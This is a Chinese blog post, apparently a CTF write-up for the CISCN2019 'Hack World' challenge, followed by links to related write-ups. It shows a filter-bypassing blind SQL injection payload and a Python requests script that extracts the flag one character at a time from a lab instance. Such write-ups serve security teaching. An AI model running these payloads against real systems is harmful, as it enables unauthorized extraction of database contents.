[CISCN2019 华北赛区 Day2 Web1]Hack World

于 2024-03-27 23:28:09 发布
阅读量203 收藏
点赞数 3
文章标签: ctf python sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74790320/article/details/137093069
版权
文章介绍了在遇到SQL注入时,如何通过构建payload并利用ASCII值进行盲注攻击,绕过字符集过滤,最终成功获取flag的过程。作者使用Python的requests库实现了一个脚本进行演示。
摘要由CSDN通过智能技术生成

本题首先考察的是sql注入

拿过滤字符集先跑一遍

发现以上字符集都被过滤了

尝试id=1

id=1=1

尝试id=(1)=(2)

这里就已经给出了个思路我们可以尝试盲注去打

id=(select(ascii(mid(flag,1,1))=102)from(flag))

这里表跟列已经给了我们了,所以我们可以写脚本了

import requests
import string


def blind_injection(url):
    flag=''
    strings = string.printable
    for num in range(1,60):
        for i in strings:
            payload = f'(select(ascii(mid(flag,{num},1))={ord(i)})from(flag))'
            post_data = {"id":payload}
            try:
                res = requests.post(url=url, data=post_data, timeout=5)
                if 'Hello' in res.text:
                    flag += i
                    print(flag)
                    break
                else:
                    continue
            except requests.exceptions.Timeout:
                print("Timeout occurred, continuing to wait...")
                continue
    print(flag)


if __name__ == '__main__':
    url = r'http://7ab87533-bfbb-4e1e-a688-19960a6964ac.node5.buuoj.cn:81/index.php'
    blind_injection(url)

可以跑出flag

bK_Rose
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
2302_79800344的博客
02-28 1746
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
[CISCN2019 华北赛区 Day2 Web1]Hack World1
最新发布
2301_78919866的博客
06-05 652
[CISCN2019 华北赛区 Day2 Web1]Hack World1题解
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1
weixin_45642610的博客
01-18 340
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World buu 限制访问频率所以要时间间隔久点 改这个函数time.sleep(0.1) import requests import time import re url='http://2c82f86e-108a-4aa5-b1d2-49fc08b0f2f9.node3.buuoj.cn/index.php' flag = '' for i in range(1,50): max = 127 min = 0
[CISCN2019]Hack World
m0_46587008的博客
11-29 994
一、Hack World 打开环境:显示“所有你想知道的都在flag表中的flag行中”。所以基本确定是sql注入 二、初探 这个时候我们确定是sql注入,开始对它进行一个初步的测试,判断采取哪种注入方式。 先输入1: 回显。 输入0: 回显不一致。 随后开始尝试报错使用 1’: 返回bool(false),没有报错信息(报错注入不可能了,第一想法是联合注入或盲注) 尝试闭合 1’–+ 或 1’#: 发现有检测,于是Fuzzing测试一下过滤了多少关键词: 发现大部分关键词都不能用,之前想法是盲注和联合
[CISCN2019 华北赛区 Day2 Web1]Hack World 不会编程的崽
不会编程的崽的博客
03-13 563
sql注入 盲注
[强网杯 2019]随便注+CISCN2019 Hack World
weixin_43940853的博客
02-24 303
这道题考察的是堆叠注入,order by判断出有两个字段 这里也过滤了一些关键词 看到有两个表,flag字段在那个纯数字的表里,但是无法查询得到 words有两列,id和data(一会第一种方法要用到) 1';show columns from `1919810931114514`;# 这里的反引号用来表示表名,这里必须加上,但是words表不用加,这里猜测和表的数据类型有关,纯数字型的要加...
[CISCN 2019华北Day2]Web1
m0_73612768的博客
01-19 1037
布尔盲注;FUZZ 测试;
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值